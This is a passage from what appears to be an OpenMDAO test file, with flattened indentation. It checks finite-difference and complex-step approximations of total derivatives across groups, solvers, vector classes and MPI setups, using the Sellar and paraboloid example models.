self.add_input('f_xy', val=np.ones(arr_size))
self.add_output('g', val=np.ones(arr_size))
# Make these partials deliberately wrong to verify they don't show up in the answer.
mat = np.array([7.0, 13, 27])
row_col = np.arange(arr_size)
self.declare_partials('g', ['f_xy'], rows=row_col, cols=row_col, val=mat)
#self.declare_partials('g', ['f_xy'])
def compute(self, inputs, outputs):
x = inputs['f_xy']
outputs['g'] = x * np.array([3.5, -1.0, 5.0])
size = 3
prob = om.Problem()
model = prob.model
ivc = om.IndepVarComp()
ivc.add_output('x', np.ones((size, )))
model.add_subsystem('p', ivc, promotes=['*'])
sub = model.add_subsystem('sub', om.Group(), promotes=['*'])
sub.add_subsystem("parab", DistParab(arr_size=size), promotes=['*'])
sub.add_subsystem("ndp", NonDistComp(arr_size=size), promotes=['*'])
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_constraint('g', lower=0.0)
sub.approx_totals(method='fd')
prob.setup()
prob.run_model()
of = ['sub.ndp.g']
totals = prob.driver._compute_totals(of=of, wrt=['p.x'], return_format='dict')
assert_near_equal(totals['sub.ndp.g']['p.x'], np.diag([7.0, -2.0, 10.0]), 1e-6)
totals = prob.check_totals()
for key, val in totals.items():
assert_near_equal(val['rel error'][0], 0.0, 1e-6)
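# A standalone sketch (not run by the suite) of the pattern exercised in
# test_bug_subsolve above; the component and variable names here are
# illustrative. Once a group calls approx_totals(), partials that its children
# declared with 'val' must not leak into the approximated derivatives.
def _example_group_fd_ignores_child_partials():
    import openmdao.api as om

    class BadPartials(om.ExplicitComponent):
        def setup(self):
            self.add_input('x', val=0.0)
            self.add_output('y', val=0.0)
            # Deliberately wrong value; group-level FD should override it.
            self.declare_partials('y', 'x', val=999.0)

        def compute(self, inputs, outputs):
            outputs['y'] = 3.0 * inputs['x']

    prob = om.Problem()
    prob.model.add_subsystem('p', om.IndepVarComp('x', 2.0), promotes=['x'])
    sub = prob.model.add_subsystem('sub', om.Group(), promotes=['*'])
    sub.add_subsystem('comp', BadPartials(), promotes=['*'])
    sub.approx_totals(method='fd')
    prob.setup()
    prob.run_model()
    # Expect roughly 3.0 here, not 999.0.
    return prob.compute_totals(of=['y'], wrt=['x'])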
@unittest.skipUnless(MPI and PETScVector, "MPI and PETSc are required.")
class TestGroupFiniteDifferenceMPI(unittest.TestCase):
N_PROCS = 2
def test_indepvarcomp_under_par_sys(self):
prob = om.Problem()
prob.model = FanInSubbedIDVC()
prob.model.approx_totals()
prob.setup(local_vector_class=vector_class, check=False, mode='rev')
prob.set_solver_print(level=0)
prob.run_model()
J = prob.compute_totals(wrt=['sub.sub1.p1.x', 'sub.sub2.p2.x'], of=['sum.y'])
assert_near_equal(J['sum.y', 'sub.sub1.p1.x'], [[2.0]], 1.0e-6)
assert_near_equal(J['sum.y', 'sub.sub2.p2.x'], [[4.0]], 1.0e-6)
@unittest.skipUnless(MPI and PETScVector, "MPI and PETSc are required.")
class TestGroupCSMPI(unittest.TestCase):
N_PROCS = 2
def test_indepvarcomp_under_par_sys_par_cs(self):
prob = om.Problem()
prob.model = FanInSubbedIDVC(num_par_fd=2)
prob.model.approx_totals(method='cs')
prob.setup(local_vector_class=vector_class, check=False, mode='rev')
prob.set_solver_print(level=0)
prob.run_model()
J = prob.compute_totals(wrt=['sub.sub1.p1.x', 'sub.sub2.p2.x'], of=['sum.y'])
assert_near_equal(J['sum.y', 'sub.sub1.p1.x'], [[2.0]], 1.0e-6)
assert_near_equal(J['sum.y', 'sub.sub2.p2.x'], [[4.0]], 1.0e-6)
@unittest.skipUnless(MPI and PETScVector, "MPI and PETSc are required.")
class TestGroupFDMPI(unittest.TestCase):
N_PROCS = 2
def test_indepvarcomp_under_par_sys_par_fd(self):
prob = om.Problem()
prob.model = FanInSubbedIDVC(num_par_fd=2)
prob.model.approx_totals(method='fd')
prob.setup(local_vector_class=vector_class, check=False, mode='rev')
prob.set_solver_print(level=0)
prob.run_model()
J = prob.compute_totals(wrt=['sub.sub1.p1.x', 'sub.sub2.p2.x'], of=['sum.y'])
assert_near_equal(J['sum.y', 'sub.sub1.p1.x'], [[2.0]], 1.0e-6)
assert_near_equal(J['sum.y', 'sub.sub2.p2.x'], [[4.0]], 1.0e-6)
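# The three MPI test classes above exercise parallel FD/CS: a group constructed
# with num_par_fd=N (here, FanInSubbedIDVC(num_par_fd=2)) splits its
# finite-difference columns across N processes. A sketch of the relevant calls,
# assuming an MPI launch such as `mpirun -n 2 python -m pytest <this file>`:
#
#     prob.model = FanInSubbedIDVC(num_par_fd=2)
#     prob.model.approx_totals(method='fd')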
def title(txt):
""" Provide nice title for parameterized testing."""
return str(txt).split('.')[-1].replace("'", '').replace('>', '')
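# For example, title(om.DefaultVector) returns 'DefaultVector': str() of the
# class is "<class 'openmdao.vectors.default_vector.DefaultVector'>" (the exact
# module path may vary by version), the split keeps "DefaultVector'>", and the
# two replaces strip the quote and the bracket.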
class TestGroupComplexStep(unittest.TestCase):
def setUp(self):
self.prob = om.Problem()
def tearDown(self):
# Global state may not get cleaned up if a test fails.
try:
self.prob.model._outputs._under_complex_step = False
except Exception:
pass
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_paraboloid_'+'_'.join(title(a) for a in p.args))
def test_paraboloid(self, vec_class):
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
prob = self.prob
model = prob.model
model.add_subsystem('p1', om.IndepVarComp('x', 0.0), promotes=['x'])
model.add_subsystem('p2', om.IndepVarComp('y', 0.0), promotes=['y'])
model.add_subsystem('comp', Paraboloid(), promotes=['x', 'y', 'f_xy'])
model.linear_solver = om.ScipyKrylov()
model.approx_totals(method='cs')
prob.setup(check=False, mode='fwd', local_vector_class=vec_class)
prob.set_solver_print(level=0)
prob.run_model()
of = ['f_xy']
wrt = ['x', 'y']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['f_xy', 'x'], [[-6.0]], 1e-6)
assert_near_equal(derivs['f_xy', 'y'], [[8.0]], 1e-6)
# 1 output x 2 inputs
self.assertEqual(len(model._approx_schemes['cs']._exec_dict), 2)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_paraboloid_subbed_'+'_'.join(title(a) for a in p.args))
def test_paraboloid_subbed(self, vec_class):
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
prob = self.prob
model = prob.model
model.add_subsystem('p1', om.IndepVarComp('x', 0.0), promotes=['x'])
model.add_subsystem('p2', om.IndepVarComp('y', 0.0), promotes=['y'])
sub = model.add_subsystem('sub', om.Group(), promotes=['x', 'y', 'f_xy'])
sub.add_subsystem('comp', Paraboloid(), promotes=['x', 'y', 'f_xy'])
model.linear_solver = om.ScipyKrylov()
sub.approx_totals(method='cs')
prob.setup(check=False, mode='fwd', local_vector_class=vec_class)
prob.set_solver_print(level=0)
prob.run_model()
of = ['f_xy']
wrt = ['x', 'y']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['f_xy', 'x'], [[-6.0]], 1e-6)
assert_near_equal(derivs['f_xy', 'y'], [[8.0]], 1e-6)
Jfd = sub._jacobian
assert_near_equal(Jfd['sub.comp.f_xy', 'sub.comp.x'], [[-6.0]], 1e-6)
assert_near_equal(Jfd['sub.comp.f_xy', 'sub.comp.y'], [[8.0]], 1e-6)
# 1 output x 2 inputs
self.assertEqual(len(sub._approx_schemes['cs']._exec_dict), 2)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_parab_subbed_with_connections_'+'_'.join(title(a) for a in p.args))
def test_paraboloid_subbed_with_connections(self, vec_class):
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
prob = self.prob
model = prob.model
model.add_subsystem('p1', om.IndepVarComp('x', 0.0))
model.add_subsystem('p2', om.IndepVarComp('y', 0.0))
sub = model.add_subsystem('sub', om.Group())
sub.add_subsystem('bx', om.ExecComp('xout = xin'))
sub.add_subsystem('by', om.ExecComp('yout = yin'))
sub.add_subsystem('comp', Paraboloid())
model.connect('p1.x', 'sub.bx.xin')
model.connect('sub.bx.xout', 'sub.comp.x')
model.connect('p2.y', 'sub.by.yin')
model.connect('sub.by.yout', 'sub.comp.y')
model.linear_solver = om.ScipyKrylov()
sub.approx_totals(method='cs')
prob.setup(check=False, mode='fwd', local_vector_class=vec_class)
prob.set_solver_print(level=0)
prob.run_model()
of = ['sub.comp.f_xy']
wrt = ['p1.x', 'p2.y']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['sub.comp.f_xy', 'p1.x'], [[-6.0]], 1e-6)
assert_near_equal(derivs['sub.comp.f_xy', 'p2.y'], [[8.0]], 1e-6)
Jfd = sub._jacobian
assert_near_equal(Jfd['sub.comp.f_xy', 'sub.bx.xin'], [[-6.0]], 1e-6)
assert_near_equal(Jfd['sub.comp.f_xy', 'sub.by.yin'], [[8.0]], 1e-6)
# 3 outputs x 2 inputs
n_entries = 0
for k, v in sub._approx_schemes['cs']._exec_dict.items():
n_entries += len(v)
self.assertEqual(n_entries, 6)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_array_comp_'+'_'.join(title(a) for a in p.args))
def test_array_comp(self, vec_class):
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
class DoubleArrayFD(DoubleArrayComp):
def compute_partials(self, inputs, partials):
"""
Override deriv calculation.
"""
pass
prob = self.prob
model = prob.model
model.add_subsystem('p1', om.IndepVarComp('x1', val=np.ones(2)))
model.add_subsystem('p2', om.IndepVarComp('x2', val=np.ones(2)))
comp = model.add_subsystem('comp', DoubleArrayFD())
model.connect('p1.x1', 'comp.x1')
model.connect('p2.x2', 'comp.x2')
model.linear_solver = om.ScipyKrylov()
model.approx_totals(method='cs')
prob.setup(check=False, local_vector_class=vec_class)
prob.run_model()
model.run_linearize()
Jfd = model._jacobian
assert_near_equal(Jfd['comp.y1', 'p1.x1'], comp.JJ[0:2, 0:2], 1e-6)
assert_near_equal(Jfd['comp.y1', 'p2.x2'], comp.JJ[0:2, 2:4], 1e-6)
assert_near_equal(Jfd['comp.y2', 'p1.x1'], comp.JJ[2:4, 0:2], 1e-6)
assert_near_equal(Jfd['comp.y2', 'p2.x2'], comp.JJ[2:4, 2:4], 1e-6)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_unit_conv_group_'+'_'.join(title(a) for a in p.args))
def test_unit_conv_group(self, vec_class):
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
prob = self.prob
prob.model.add_subsystem('px1', om.IndepVarComp('x1', 100.0), promotes=['x1'])
sub1 = prob.model.add_subsystem('sub1', om.Group())
sub2 = prob.model.add_subsystem('sub2', om.Group())
sub1.add_subsystem('src', SrcComp())
sub2.add_subsystem('tgtF', TgtCompF())
sub2.add_subsystem('tgtC', TgtCompC())
sub2.add_subsystem('tgtK', TgtCompK())
prob.model.connect('x1', 'sub1.src.x1')
prob.model.connect('sub1.src.x2', 'sub2.tgtF.x2')
prob.model.connect('sub1.src.x2', 'sub2.tgtC.x2')
prob.model.connect('sub1.src.x2', 'sub2.tgtK.x2')
sub2.approx_totals(method='cs')
prob.setup(check=False, local_vector_class=vec_class)
prob.run_model()
assert_near_equal(prob['sub1.src.x2'], 100.0, 1e-6)
assert_near_equal(prob['sub2.tgtF.x3'], 212.0, 1e-6)
assert_near_equal(prob['sub2.tgtC.x3'], 100.0, 1e-6)
assert_near_equal(prob['sub2.tgtK.x3'], 373.15, 1e-6)
wrt = ['x1']
of = ['sub2.tgtF.x3', 'sub2.tgtC.x3', 'sub2.tgtK.x3']
J = prob.compute_totals(of=of, wrt=wrt, return_format='dict')
assert_near_equal(J['sub2.tgtF.x3']['x1'][0][0], 1.8, 1e-6)
assert_near_equal(J['sub2.tgtC.x3']['x1'][0][0], 1.0, 1e-6)
assert_near_equal(J['sub2.tgtK.x3']['x1'][0][0], 1.0, 1e-6)
# Check the total derivatives in reverse mode
prob.setup(check=False, mode='rev', local_vector_class=vec_class)
prob.run_model()
J = prob.compute_totals(of=of, wrt=wrt, return_format='dict')
assert_near_equal(J['sub2.tgtF.x3']['x1'][0][0], 1.8, 1e-6)
assert_near_equal(J['sub2.tgtC.x3']['x1'][0][0], 1.0, 1e-6)
assert_near_equal(J['sub2.tgtK.x3']['x1'][0][0], 1.0, 1e-6)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_sellar_'+'_'.join(title(a) for a in p.args))
def test_sellar(self, vec_class):
# Basic sellar test.
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
prob = self.prob
model = prob.model
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
model.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
model.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
prob.model.nonlinear_solver = om.NonlinearBlockGS()
prob.model.nonlinear_solver.options['atol'] = 1e-50
prob.model.nonlinear_solver.options['rtol'] = 1e-50
model.approx_totals(method='cs')
prob.setup(check=False, local_vector_class=vec_class)
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z']
of = ['obj']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, .00001)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, .00001)
self.assertFalse(model._vectors['output']['linear']._alloc_complex,
msg="Linear vector should not be allocated as complex.")
def test_desvar_and_response_with_indices(self):
class ArrayComp2D(om.ExplicitComponent):
"""
A fairly simple array component.
"""
def setup(self):
self.JJ = np.array([[1.0, 3.0, -2.0, 7.0],
[6.0, 2.5, 2.0, 4.0],
[-1.0, 0.0, 8.0, 1.0],
[1.0, 4.0, -5.0, 6.0]])
# Params
self.add_input('x1', np.zeros([4]))
# Unknowns
self.add_output('y1', np.zeros([4]))
self.declare_partials(of='*', wrt='*')
def compute(self, inputs, outputs):
"""
Execution.
"""
outputs['y1'] = self.JJ.dot(inputs['x1'])
def compute_partials(self, inputs, partials):
"""
Analytical derivatives.
"""
partials[('y1', 'x1')] = self.JJ
prob = om.Problem()
model = prob.model
mycomp = model.add_subsystem('mycomp', ArrayComp2D(), promotes=['x1', 'y1'])
model.add_design_var('x1', indices=[1, 3])
model.add_constraint('y1', indices=[0, 2])
prob.set_solver_print(level=0)
model.approx_totals(method='cs')
prob.setup(check=False, mode='fwd')
prob.run_model()
Jbase = mycomp.JJ
of = ['y1']
wrt = ['x1']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['y1', 'x1'][0][0], Jbase[0, 1], 1e-8)
assert_near_equal(J['y1', 'x1'][0][1], Jbase[0, 3], 1e-8)
assert_near_equal(J['y1', 'x1'][1][0], Jbase[2, 1], 1e-8)
assert_near_equal(J['y1', 'x1'][1][1], Jbase[2, 3], 1e-8)
def test_desvar_with_indices(self):
# Just desvars on this one to cover code missed by desvar+response test.
class ArrayComp2D(om.ExplicitComponent):
"""
A fairly simple array component.
"""
def setup(self):
self.JJ = np.array([[1.0, 3.0, -2.0, 7.0],
[6.0, 2.5, 2.0, 4.0],
[-1.0, 0.0, 8.0, 1.0],
[1.0, 4.0, -5.0, 6.0]])
# Params
self.add_input('x1', np.zeros([4]))
# Unknowns
self.add_output('y1', np.zeros([4]))
self.declare_partials(of='*', wrt='*')
def compute(self, inputs, outputs):
"""
Execution.
"""
outputs['y1'] = self.JJ.dot(inputs['x1'])
def compute_partials(self, inputs, partials):
"""
Analytical derivatives.
"""
partials[('y1', 'x1')] = self.JJ
prob = om.Problem()
model = prob.model
model.add_subsystem('x_param1', om.IndepVarComp('x1', np.ones((4))),
promotes=['x1'])
mycomp = model.add_subsystem('mycomp', ArrayComp2D(), promotes=['x1', 'y1'])
model.add_design_var('x1', indices=[1, 3])
model.add_constraint('y1')
prob.set_solver_print(level=0)
model.approx_totals(method='cs')
prob.setup(check=False, mode='fwd')
prob.run_model()
Jbase = mycomp.JJ
of = ['y1']
wrt = ['x1']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['y1', 'x1'][0][0], Jbase[0, 1], 1e-8)
assert_near_equal(J['y1', 'x1'][0][1], Jbase[0, 3], 1e-8)
assert_near_equal(J['y1', 'x1'][2][0], Jbase[2, 1], 1e-8)
assert_near_equal(J['y1', 'x1'][2][1], Jbase[2, 3], 1e-8)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_newton_with_direct_solver_'+'_'.join(title(a) for a in p.args))
def test_newton_with_direct_solver(self, vec_class):
# Basic sellar test.
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
prob = om.Problem()
model = prob.model
sub = model.add_subsystem('sub', om.Group(), promotes=['*'])
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
sub.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
sub.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
sub.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
sub.linear_solver = om.DirectSolver(assemble_jac=False)
sub.nonlinear_solver.options['atol'] = 1e-10
sub.nonlinear_solver.options['rtol'] = 1e-10
model.approx_totals(method='cs')
prob.setup(check=False, local_vector_class=vec_class)
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z', 'x']
of = ['obj', 'con1', 'con2']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, 1.0e-6)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, 1.0e-6)
assert_near_equal(J['obj', 'x'][0][0], 2.98061391, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][0], -9.61002186, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][1], -0.78449158, 1.0e-6)
assert_near_equal(J['con1', 'x'][0][0], -0.98061448, 1.0e-6)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_newton_with_direct_solver_dense_'+'_'.join(title(a) for a in p.args))
def test_newton_with_direct_solver_dense(self, vec_class):
# Basic sellar test.
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
prob = om.Problem()
model = prob.model
sub = model.add_subsystem('sub', om.Group(), promotes=['*'])
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
sub.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
sub.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
sub.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
sub.linear_solver = om.DirectSolver()
sub.options['assembled_jac_type'] = 'dense'
sub.nonlinear_solver.options['atol'] = 1e-10
sub.nonlinear_solver.options['rtol'] = 1e-10
model.approx_totals(method='cs')
prob.setup(check=False, local_vector_class=vec_class)
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z', 'x']
of = ['obj', 'con1', 'con2']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, 1.0e-6)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, 1.0e-6)
assert_near_equal(J['obj', 'x'][0][0], 2.98061391, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][0], -9.61002186, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][1], -0.78449158, 1.0e-6)
assert_near_equal(J['con1', 'x'][0][0], -0.98061448, 1.0e-6)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_newton_with_direct_solver_csc_'+'_'.join(title(a) for a in p.args))
def test_newton_with_direct_solver_csc(self, vec_class):
# Basic sellar test.
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
prob = om.Problem()
model = prob.model
sub = model.add_subsystem('sub', om.Group(), promotes=['*'])
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
sub.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
sub.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
sub.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
sub.linear_solver = om.DirectSolver()
sub.options['assembled_jac_type'] = 'csc'
sub.nonlinear_solver.options['atol'] = 1e-10
sub.nonlinear_solver.options['rtol'] = 1e-10
model.approx_totals(method='cs')
prob.setup(check=False, local_vector_class=vec_class)
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z', 'x']
of = ['obj', 'con1', 'con2']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, 1.0e-6)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, 1.0e-6)
assert_near_equal(J['obj', 'x'][0][0], 2.98061391, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][0], -9.61002186, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][1], -0.78449158, 1.0e-6)
assert_near_equal(J['con1', 'x'][0][0], -0.98061448, 1.0e-6)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_subbed_newton_gs_'+'_'.join(title(a) for a in p.args))
def test_subbed_newton_gs(self, vec_class):
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
from openmdao.test_suite.components.sellar import SellarDis1withDerivatives, SellarDis2withDerivatives
class SellarDerivatives(om.Group):
def setup(self):
self.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
self.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
self.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
self.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
sub = self.add_subsystem('sub', om.Group(), promotes=['*'])
sub.linear_solver = om.DirectSolver(assemble_jac=True)
sub.options['assembled_jac_type'] = 'csc'
sub.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)', obj=0.0,
x=0.0, z=np.array([0.0, 0.0]), y1=0.0, y2=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
sub.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1', con1=0.0, y1=0.0),
promotes=['con1', 'y1'])
sub.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0', con2=0.0, y2=0.0),
promotes=['con2', 'y2'])
self.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
self.linear_solver = om.LinearBlockGS()
self.linear_solver.options['maxiter'] = 25
self.linear_solver.options['atol'] = 1e-16
prob = om.Problem()
prob.model = SellarDerivatives()
prob.setup()
prob.model.approx_totals(method='cs')
prob.run_model()
wrt = ['z', 'x']
of = ['obj', 'con1', 'con2']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, 1.0e-6)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, 1.0e-6)
assert_near_equal(J['obj', 'x'][0][0], 2.98061391, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][0], -9.61002186, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][1], -0.78449158, 1.0e-6)
assert_near_equal(J['con1', 'x'][0][0], -0.98061448, 1.0e-6)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_subbed_newton_gs_csc_external_mtx_'+'_'.join(title(a) for a in p.args))
def test_subbed_newton_gs_csc_external_mtx(self, vec_class):
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
from openmdao.test_suite.components.sellar import SellarDis1withDerivatives, SellarDis2withDerivatives
class SellarDerivatives(om.Group):
def setup(self):
self.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
self.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
self.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
self.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
sub = self.add_subsystem('sub', om.Group(), promotes=['*'])
sub.linear_solver = om.DirectSolver(assemble_jac=True)
sub.options['assembled_jac_type'] = 'csc'
sub.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)', obj=0.0,
x=0.0, z=np.array([0.0, 0.0]), y1=0.0, y2=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
sub.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1', con1=0.0, y1=0.0),
promotes=['con1', 'y1'])
sub.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0', con2=0.0, y2=0.0),
promotes=['con2', 'y2'])
self.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
self.linear_solver = om.LinearBlockGS()
self.linear_solver.options['maxiter'] = 25
self.linear_solver.options['atol'] = 1e-16
prob = om.Problem()
prob.model = SellarDerivatives()
prob.setup()
prob.model.approx_totals(method='cs')
prob.run_model()
wrt = ['z', 'x']
of = ['obj', 'con1', 'con2']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, 1.0e-6)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, 1.0e-6)
assert_near_equal(J['obj', 'x'][0][0], 2.98061391, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][0], -9.61002186, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][1], -0.78449158, 1.0e-6)
assert_near_equal(J['con1', 'x'][0][0], -0.98061448, 1.0e-6)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_subbed_newton_gs_dense_external_mtx_'+'_'.join(title(a) for a in p.args))
def test_subbed_newton_gs_dense_external_mtx(self, vec_class):
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
from openmdao.test_suite.components.sellar import SellarDis1withDerivatives, SellarDis2withDerivatives
class SellarDerivatives(om.Group):
def setup(self):
self.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
self.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
self.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
self.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
sub = self.add_subsystem('sub', om.Group(), promotes=['*'])
sub.linear_solver = om.DirectSolver(assemble_jac=True)
sub.options['assembled_jac_type'] = 'dense'
sub.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)', obj=0.0,
x=0.0, z=np.array([0.0, 0.0]), y1=0.0, y2=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
sub.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1', con1=0.0, y1=0.0),
promotes=['con1', 'y1'])
